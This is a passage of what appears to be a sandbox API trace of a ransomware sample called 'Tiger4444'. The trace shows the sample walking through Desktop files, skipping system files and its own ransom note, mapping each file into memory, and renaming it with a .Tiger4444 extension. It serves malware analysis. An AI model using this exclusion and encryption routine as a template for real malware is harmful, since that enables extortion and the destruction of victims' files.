lstrcmpiW (lpString1="IwTT.png", lpString2=".") returned 1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2="..") returned 1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2="windows") returned -1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2="bootmgr") returned 1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2="pagefile.sys") returned -1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2="boot") returned 1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2="ids.txt") returned 1 [0049.778] lstrcmpiW (lpString1="IwTT.png", lpString2="NTUSER.DAT") returned -1 [0049.778] lstrcpyW (in: lpString1=0x30aeae6, lpString2="IwTT.png" | out: lpString1="IwTT.png") returned="IwTT.png" [0049.778] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\IwTT.png", dwFileAttributes=0x0) returned 1 [0049.779] lstrlenW (lpString="IwTT.png") returned 8 [0049.779] lstrlenW (lpString="Tiger4444") returned 9 [0049.779] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0049.779] lstrlenW (lpString=".dll") returned 4 [0049.779] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0049.779] lstrlenW (lpString=".lnk") returned 4 [0049.779] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0049.779] lstrlenW (lpString=".ini") returned 4 [0049.779] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0049.779] lstrlenW (lpString=".sys") returned 4 [0049.779] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0049.779] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\IwTT.png" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\iwtt.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.779] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.779] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14123224974) returned 1 [0049.780] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=36776) returned 1 [0049.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0049.780] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0049.780] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x92b0, lpName=0x0) returned 0x2c8 [0049.780] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x92b0) returned 0xbe0000 [0049.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.781] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0049.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0049.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0049.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0049.782] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14123548458) returned 1 [0049.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0049.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0049.782] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.783] CloseHandle (hObject=0x2c8) returned 1 [0049.783] CloseHandle (hObject=0x260) returned 1 [0049.784] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\IwTT.png.Tiger4444") returned 49 [0049.784] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\IwTT.png" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\iwtt.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\IwTT.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\iwtt.png.tiger4444"), dwFlags=0x1) returned 1 [0049.785] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x512f60c0, ftCreationTime.dwHighDateTime=0x1d4c8f1, ftLastAccessTime.dwLowDateTime=0x40786460, ftLastAccessTime.dwHighDateTime=0x1d4ce7e, ftLastWriteTime.dwLowDateTime=0x40786460, ftLastWriteTime.dwHighDateTime=0x1d4ce7e, nFileSizeHigh=0x0, nFileSizeLow=0x16e15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q5 t9C04vQ_Z8QALJL.wav", cAlternateFileName="Q5T9C0~1.WAV")) returned 1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2="Tiger4444.exe") returned -1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2=".") returned 1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2="..") returned 1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2="windows") returned -1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2="bootmgr") returned 1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2="pagefile.sys") returned 1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2="boot") returned 1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2="ids.txt") returned 1 [0049.785] lstrcmpiW (lpString1="q5 t9C04vQ_Z8QALJL.wav", lpString2="NTUSER.DAT") returned 1 [0049.785] lstrcpyW (in: lpString1=0x30aeae6, lpString2="q5 t9C04vQ_Z8QALJL.wav" | out: lpString1="q5 t9C04vQ_Z8QALJL.wav") returned="q5 t9C04vQ_Z8QALJL.wav" [0049.785] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\q5 t9C04vQ_Z8QALJL.wav", dwFileAttributes=0x0) returned 1 [0049.785] lstrlenW (lpString="q5 t9C04vQ_Z8QALJL.wav") returned 22 [0049.785] lstrlenW (lpString="Tiger4444") returned 9 [0049.785] lstrcmpiW (lpString1="QALJL.wav", lpString2="Tiger4444") returned -1 [0049.785] lstrlenW (lpString=".dll") returned 4 [0049.785] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.785] lstrlenW (lpString=".lnk") returned 4 [0049.785] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.785] lstrlenW (lpString=".ini") returned 4 [0049.785] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.785] lstrlenW (lpString=".sys") returned 4 [0049.785] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.785] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\q5 t9C04vQ_Z8QALJL.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\q5 t9c04vq_z8qaljl.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.786] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.786] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14123886530) returned 1 [0049.786] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=93717) returned 1 [0049.786] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0049.786] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0049.786] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17120, lpName=0x0) returned 0x2c8 [0049.786] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17120) returned 0xbe0000 [0049.789] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.789] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0049.789] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.789] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0049.789] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0049.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0049.791] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14124373494) returned 1 [0049.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0049.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0049.791] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.792] CloseHandle (hObject=0x2c8) returned 1 [0049.792] CloseHandle (hObject=0x260) returned 1 [0049.793] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\q5 t9C04vQ_Z8QALJL.wav.Tiger4444") returned 63 [0049.793] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\q5 t9C04vQ_Z8QALJL.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\q5 t9c04vq_z8qaljl.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\q5 t9C04vQ_Z8QALJL.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\q5 t9c04vq_z8qaljl.wav.tiger4444"), dwFlags=0x1) returned 1 [0049.794] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cb33ab0, ftCreationTime.dwHighDateTime=0x1d4c81d, ftLastAccessTime.dwLowDateTime=0x5399ad10, ftLastAccessTime.dwHighDateTime=0x1d4d441, ftLastWriteTime.dwLowDateTime=0x5399ad10, ftLastWriteTime.dwHighDateTime=0x1d4d441, nFileSizeHigh=0x0, nFileSizeLow=0x9f89, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UeZ-KD32H74.avi", cAlternateFileName="UEZ-KD~1.AVI")) returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2="Tiger4444.exe") returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2=".") returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2="..") returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2="windows") returned -1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2="bootmgr") returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2="pagefile.sys") returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2="boot") returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2="ids.txt") returned 1 [0049.794] lstrcmpiW (lpString1="UeZ-KD32H74.avi", lpString2="NTUSER.DAT") returned 1 [0049.794] lstrcpyW (in: lpString1=0x30aeae6, lpString2="UeZ-KD32H74.avi" | out: lpString1="UeZ-KD32H74.avi") returned="UeZ-KD32H74.avi" [0049.794] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\UeZ-KD32H74.avi", dwFileAttributes=0x0) returned 1 [0049.794] lstrlenW (lpString="UeZ-KD32H74.avi") returned 15 [0049.794] lstrlenW (lpString="Tiger4444") returned 9 [0049.794] lstrcmpiW (lpString1="32H74.avi", lpString2="Tiger4444") returned -1 [0049.794] lstrlenW (lpString=".dll") returned 4 [0049.794] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0049.794] lstrlenW (lpString=".lnk") returned 4 [0049.795] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0049.795] lstrlenW (lpString=".ini") returned 4 [0049.795] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0049.795] lstrlenW (lpString=".sys") returned 4 [0049.795] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0049.795] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\UeZ-KD32H74.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\uez-kd32h74.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.795] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.795] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14124812519) returned 1 [0049.795] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=40841) returned 1 [0049.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0049.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0049.795] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa290, lpName=0x0) returned 0x2c8 [0049.795] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa290) returned 0xbe0000 [0049.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0049.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0049.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0049.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0049.798] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14125088074) returned 1 [0049.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0049.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0049.798] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.798] CloseHandle (hObject=0x2c8) returned 1 [0049.798] CloseHandle (hObject=0x260) returned 1 [0049.799] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\UeZ-KD32H74.avi.Tiger4444") returned 56 [0049.799] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\UeZ-KD32H74.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\uez-kd32h74.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\UeZ-KD32H74.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\uez-kd32h74.avi.tiger4444"), dwFlags=0x1) returned 1 [0049.800] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d0ebb90, ftCreationTime.dwHighDateTime=0x1d4ca56, ftLastAccessTime.dwLowDateTime=0xb6d98dd0, ftLastAccessTime.dwHighDateTime=0x1d4d583, ftLastWriteTime.dwLowDateTime=0xb6d98dd0, ftLastWriteTime.dwHighDateTime=0x1d4d583, nFileSizeHigh=0x0, nFileSizeLow=0x9c20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x2mPfTMZrBzEwZuAHfp.png", cAlternateFileName="X2MPFT~1.PNG")) returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2="Tiger4444.exe") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2=".") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2="..") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2="windows") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2="bootmgr") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2="pagefile.sys") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2="boot") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2="ids.txt") returned 1 [0049.800] lstrcmpiW (lpString1="x2mPfTMZrBzEwZuAHfp.png", lpString2="NTUSER.DAT") returned 1 [0049.801] lstrcpyW (in: lpString1=0x30aeae6, lpString2="x2mPfTMZrBzEwZuAHfp.png" | out: lpString1="x2mPfTMZrBzEwZuAHfp.png") returned="x2mPfTMZrBzEwZuAHfp.png" [0049.801] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\x2mPfTMZrBzEwZuAHfp.png", dwFileAttributes=0x0) returned 1 [0049.801] lstrlenW (lpString="x2mPfTMZrBzEwZuAHfp.png") returned 23 [0049.801] lstrlenW (lpString="Tiger4444") returned 9 [0049.801] lstrcmpiW (lpString1="uAHfp.png", lpString2="Tiger4444") returned 1 [0049.801] lstrlenW (lpString=".dll") returned 4 [0049.801] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0049.801] lstrlenW (lpString=".lnk") returned 4 [0049.801] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0049.801] lstrlenW (lpString=".ini") returned 4 [0049.801] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0049.801] lstrlenW (lpString=".sys") returned 4 [0049.801] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0049.801] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\x2mPfTMZrBzEwZuAHfp.png" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\x2mpftmzrbzewzuahfp.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.801] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.801] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14125452822) returned 1 [0049.801] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=39968) returned 1 [0049.802] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0049.802] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0049.802] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9f20, lpName=0x0) returned 0x2c8 [0049.802] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9f20) returned 0xbe0000 [0049.803] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.803] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0049.803] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.803] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0049.803] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.803] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0049.803] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.803] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0049.803] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14125631370) returned 1 [0049.803] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0049.803] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0049.803] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.804] CloseHandle (hObject=0x2c8) returned 1 [0049.804] CloseHandle (hObject=0x260) returned 1 [0049.805] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\x2mPfTMZrBzEwZuAHfp.png.Tiger4444") returned 64 [0049.805] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\x2mPfTMZrBzEwZuAHfp.png" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\x2mpftmzrbzewzuahfp.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\x2mPfTMZrBzEwZuAHfp.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\x2mpftmzrbzewzuahfp.png.tiger4444"), dwFlags=0x1) returned 1 [0049.808] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb30a45d0, ftCreationTime.dwHighDateTime=0x1d4d3a0, ftLastAccessTime.dwLowDateTime=0xfd702420, ftLastAccessTime.dwHighDateTime=0x1d4c854, ftLastWriteTime.dwLowDateTime=0xfd702420, ftLastWriteTime.dwHighDateTime=0x1d4c854, nFileSizeHigh=0x0, nFileSizeLow=0xac8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yeOiJ.swf", cAlternateFileName="")) returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="Tiger4444.exe") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2=".") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="..") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="windows") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="bootmgr") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="pagefile.sys") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="boot") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="ids.txt") returned 1 [0049.808] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="NTUSER.DAT") returned 1 [0049.808] lstrcpyW (in: lpString1=0x30aeae6, lpString2="yeOiJ.swf" | out: lpString1="yeOiJ.swf") returned="yeOiJ.swf" [0049.808] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\yeOiJ.swf", dwFileAttributes=0x0) returned 1 [0049.809] lstrlenW (lpString="yeOiJ.swf") returned 9 [0049.809] lstrlenW (lpString="Tiger4444") returned 9 [0049.809] lstrcmpiW (lpString1="yeOiJ.swf", lpString2="Tiger4444") returned 1 [0049.809] lstrlenW (lpString=".dll") returned 4 [0049.809] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0049.809] lstrlenW (lpString=".lnk") returned 4 [0049.809] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0049.809] lstrlenW (lpString=".ini") returned 4 [0049.809] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0049.809] lstrlenW (lpString=".sys") returned 4 [0049.809] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0049.809] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cFnKWi\\yeOiJ.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\cfnkwi\\yeoij.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.809] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.809] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14126212662) returned 1 [0049.809] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=44174) returned 1 [0049.809] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0049.809] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0049.809] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaf90, lpName=0x0) returned 0x2c8 [0049.809] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf90) returned 0xbe0000 [0049.810] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.810] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, 